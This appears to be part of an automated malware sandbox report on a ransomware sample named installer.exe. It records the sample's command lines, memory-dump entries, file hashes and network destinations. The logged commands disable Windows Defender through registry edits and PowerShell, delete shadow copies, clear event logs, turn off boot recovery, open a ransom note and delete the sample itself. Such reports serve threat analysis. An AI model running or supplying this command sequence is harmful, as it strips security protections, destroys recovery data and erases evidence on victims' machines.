reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\installer.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1608-54-0x0000000000000000-mapping.dmp
memory/1444-55-0x0000000000000000-mapping.dmp
memory/520-56-0x0000000000000000-mapping.dmp
memory/588-57-0x0000000000000000-mapping.dmp
memory/288-58-0x0000000000000000-mapping.dmp
memory/1372-59-0x0000000000000000-mapping.dmp
memory/1376-60-0x0000000000000000-mapping.dmp
memory/860-61-0x0000000000000000-mapping.dmp
memory/1148-62-0x0000000000000000-mapping.dmp
memory/1472-63-0x0000000000000000-mapping.dmp
memory/428-64-0x0000000000000000-mapping.dmp
memory/1660-65-0x0000000000000000-mapping.dmp
memory/1152-66-0x0000000000000000-mapping.dmp
memory/1524-67-0x0000000000000000-mapping.dmp
memory/1868-68-0x0000000000000000-mapping.dmp
memory/1460-69-0x0000000000000000-mapping.dmp
memory/1940-70-0x0000000000000000-mapping.dmp
memory/1136-71-0x0000000000000000-mapping.dmp
memory/296-72-0x0000000000000000-mapping.dmp
memory/1768-73-0x0000000000000000-mapping.dmp
memory/1064-74-0x0000000000000000-mapping.dmp
memory/1792-75-0x0000000000000000-mapping.dmp
memory/752-76-0x0000000000000000-mapping.dmp
memory/1464-77-0x0000000000000000-mapping.dmp
memory/1684-78-0x0000000000000000-mapping.dmp
memory/1720-79-0x0000000000000000-mapping.dmp
memory/1584-80-0x0000000000000000-mapping.dmp
memory/900-81-0x0000000000000000-mapping.dmp
memory/268-82-0x0000000000000000-mapping.dmp
memory/748-83-0x0000000000000000-mapping.dmp
memory/544-84-0x0000000000000000-mapping.dmp
memory/1396-85-0x0000000000000000-mapping.dmp
memory/1820-86-0x0000000000000000-mapping.dmp
memory/1668-87-0x0000000000000000-mapping.dmp
memory/1648-88-0x0000000000000000-mapping.dmp
memory/2044-89-0x0000000000000000-mapping.dmp
memory/1460-90-0x0000000000000000-mapping.dmp
memory/1800-91-0x0000000000000000-mapping.dmp
memory/856-92-0x0000000000000000-mapping.dmp
memory/1084-93-0x0000000000000000-mapping.dmp
memory/2032-94-0x0000000000000000-mapping.dmp
memory/1332-95-0x0000000000000000-mapping.dmp
memory/1612-96-0x0000000000000000-mapping.dmp
memory/1916-97-0x0000000000000000-mapping.dmp
memory/1144-98-0x0000000000000000-mapping.dmp
memory/996-99-0x0000000000000000-mapping.dmp
memory/1372-100-0x0000000000000000-mapping.dmp
memory/860-101-0x0000000000000000-mapping.dmp
memory/1492-102-0x0000000000000000-mapping.dmp
memory/1056-103-0x0000000000000000-mapping.dmp
memory/940-104-0x0000000000000000-mapping.dmp
memory/1992-105-0x0000000000000000-mapping.dmp
memory/1892-106-0x0000000000000000-mapping.dmp
memory/1712-107-0x0000000000000000-mapping.dmp
memory/1592-108-0x0000000000000000-mapping.dmp
memory/524-109-0x0000000000000000-mapping.dmp
memory/1656-110-0x0000000000000000-mapping.dmp
memory/1476-111-0x0000000000000000-mapping.dmp
memory/1580-112-0x0000000000000000-mapping.dmp
memory/1580-113-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp
memory/820-114-0x0000000000000000-mapping.dmp
memory/1456-116-0x0000000000000000-mapping.dmp
memory/1908-118-0x0000000000000000-mapping.dmp
memory/1072-119-0x0000000000000000-mapping.dmp
memory/1524-120-0x0000000000000000-mapping.dmp
memory/2080-122-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp
memory/2080-124-0x0000000001E30000-0x0000000001E32000-memory.dmp
memory/2080-125-0x0000000001E32000-0x0000000001E34000-memory.dmp
memory/2080-126-0x0000000001E34000-0x0000000001E37000-memory.dmp
memory/2080-123-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 8f68b6820eee08212f7c3d286720a73d |
| SHA1 | 244247fa3c39d764b091cfd1bbabafc1286e6c85 |
| SHA256 | 6cf01622d3007b796c4695d740919203e0cb5c03eb400290aabee7480cebb278 |
| SHA512 | fd01b034c1335d705a5162908f2f1cf29494b9784d342a649cc578db7cfdcc2ad7c47869d08d6ce012db67bb30b4c4203952055cac204a8eeb5b157666cf0a8c |
memory/2172-129-0x000007FEF29C0000-0x000007FEF351D000-memory.dmp
memory/2080-130-0x0000000001E3B000-0x0000000001E5A000-memory.dmp
memory/2172-131-0x0000000002830000-0x0000000002832000-memory.dmp
memory/2172-132-0x0000000002832000-0x0000000002834000-memory.dmp
memory/2172-133-0x0000000002834000-0x0000000002837000-memory.dmp
memory/2172-134-0x000000000283B000-0x000000000285A000-memory.dmp
C:\rFSH_HOW_TO_DECRYPT.txt
| MD5 | 9feb836dd50f68cbf9e87dad21a2fbc4 |
| SHA1 | f995609d7ea8a22383c8f28e2ac9b657fa767019 |
| SHA256 | 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e |
| SHA512 | 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-05 07:36
Reported
2022-01-05 07:38
Platform
win10-en-20211208
Max time kernel
1s
Max time network
127s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.21:443 | tcp |